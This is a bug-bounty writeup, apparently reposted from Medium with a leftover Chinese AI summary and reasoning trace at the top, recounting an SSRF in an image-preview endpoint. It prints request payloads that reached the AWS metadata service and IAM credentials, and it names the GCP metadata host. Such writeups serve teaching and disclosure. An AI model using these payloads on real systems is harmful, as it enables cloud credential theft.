嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要仔细阅读这篇文章,了解它的主要内容。 这篇文章讲的是一个安全研究人员如何发现一个SSRF漏洞的过程。SSRF全称是服务器端请求伪造,是一种可以让攻击者通过服务器发起请求的安全漏洞。文章详细描述了他如何利用一个图片上传功能的API端点,通过替换URL参数,最终获取到了AWS的内部元数据和临时凭证。 接下来,我需要提炼出关键点:SSRF的定义、漏洞发现的过程、测试步骤、报告内容以及修复建议。还要注意控制在100字以内,所以要简洁明了。 然后,我要确保语言口语化,避免使用过于正式或复杂的词汇。同时,不需要使用任何markdown格式,保持自然流畅。 最后,检查一下是否涵盖了所有重要信息:SSRF是什么、如何发现的、测试步骤、报告结构以及修复措施。确保在100字以内完整表达这些内容。 </think> 文章描述了一名安全研究人员发现并报告了一个关键的服务器端请求伪造(SSRF)漏洞的过程。通过测试一个图片上传功能的API端点,他成功访问了内部AWS元数据服务,并获取了敏感凭证。文章详细介绍了漏洞发现、测试步骤、报告结构及修复建议,并强调了SSRF漏洞的重要性及对初学者的启示。 2026-3-19 04:55:46 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏
Press enter or click to view image in full size
A step-by-step bug bounty writeup that any beginner can learn from
I almost missed it.
It looked like a simple image upload feature. Nothing special. But 20 minutes later, I was reading internal AWS metadata from a server that wasn’t mine.
This is the story of how I found a critical Server-Side Request Forgery (SSRF) vulnerability — what I did, how I reported it, and what you can learn from it.
What Is SSRF? (Quick Explanation)
Before diving in, let me explain SSRF in plain English.
Imagine you ask a bank teller to go fetch a document for you. The teller goes into the back office — a place you can never enter — and brings it back. SSRF is exactly that. You trick a server into making requests on your behalf — to internal systems, cloud metadata endpoints, or even internal admin panels that are invisible to the outside world.
It’s dangerous because:
- It bypasses firewalls
- It can expose AWS/GCP/Azure cloud credentials
- In the worst case, it leads to full Remote Code Execution (RCE)
How I Found It
I was hunting on a private program on Bugcrowd. The target was a large SaaS company with a file management feature.
I noticed one specific endpoint:
POST /api/v1/fetch-preview
{"url": "https://example.com/image.jpg"}The application was fetching a URL server-side to generate a thumbnail preview. My eyes lit up.
Step 1 — Basic Test
I replaced the URL with my Burp Collaborator address:
{"url": "http://YOUR-COLLABORATOR-ID.burpcollaborator.net"}Within 2 seconds — a DNS ping hit my Collaborator. The server was making outbound requests. SSRF confirmed at basic level. ✅
Step 2 — Internal Network Probe
Next, I tried internal addresses:
{"url": "http://169.254.169.254/latest/meta-data/"}169.254.169.254 is the AWS Instance Metadata Service — a goldmine if accessible.
The response came back with:
ami-id
hostname
iam/
instance-id
instance-typeMy heart rate went up. I dug deeper:
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}Response:
EC2InstanceRoleOne more step:
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole"}And there it was — temporary AWS credentials:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "REDACTED",
"Token": "REDACTED",
"Expiration": "2026-XX-XXTXX:XX:XXZ"
}I immediately stopped. I had proof of concept. I did not use those credentials — that crosses the ethical line.
The Report I Submitted
A good bug bounty report has 5 parts:[blog.hackbynight]
Get Hacker MD’s stories in your inbox
Join Medium for free to get updates from this writer.
1. Title: Critical SSRF via /api/v1/fetch-preview — AWS IAM Credentials Exposed
2. Severity: Critical (CVSS 9.8)
3. Impact:
An attacker could use the exposed IAM credentials to access S3 buckets, read database snapshots, or potentially take over the entire AWS infrastructure.
4. Steps to Reproduce:
Exact curl command, request/response screenshots, Collaborator proof.
5. Remediation:
- Block requests to
169.254.169.254at firewall level - Implement a strict allowlist for outbound URLs
- Use IMDSv2 (token-based) instead of IMDSv1
The Result
The program triaged it as Critical within 6 hours.
The fix was deployed in 48 hours.
The bounty was paid. 💰
What You Can Learn From This
If you’re a beginner reading this, here are the 3 things I want you to take away:
1. Always test URL input fields.
Any feature that accepts a URL — image upload, webhook, PDF generator, link preview — is a potential SSRF entry point.
2. The metadata endpoint is your best friend.
http://169.254.169.254 on AWS, http://metadata.google.internal on GCP. Memorize these.
3. Stop at proof of concept.
You don’t need to dump the entire database to prove a critical bug. Show the impact clearly, stop there, and report it. Stay ethical. Always.
Tools I Used
- Burp Suite Professional — intercept and modify requests
- Burp Collaborator — detect out-of-band DNS/HTTP interactions
- curl — quick manual testing
- Nuclei — initial automated scanning
Final Thoughts
SSRF is one of the most underrated vulnerabilities in 2026. Most beginners skip URL parameters because they look boring.
Don’t be most beginners.
The boring-looking input field at 11 PM on a Tuesday is where the critical bugs hide.
Happy hunting. 🐛
Follow me on Medium for more real-world bug bounty writeups. I’m @HackerMD a cybersecurity researcher and bug bounty hunter from India.
如有侵权请联系:admin#unsafe.sh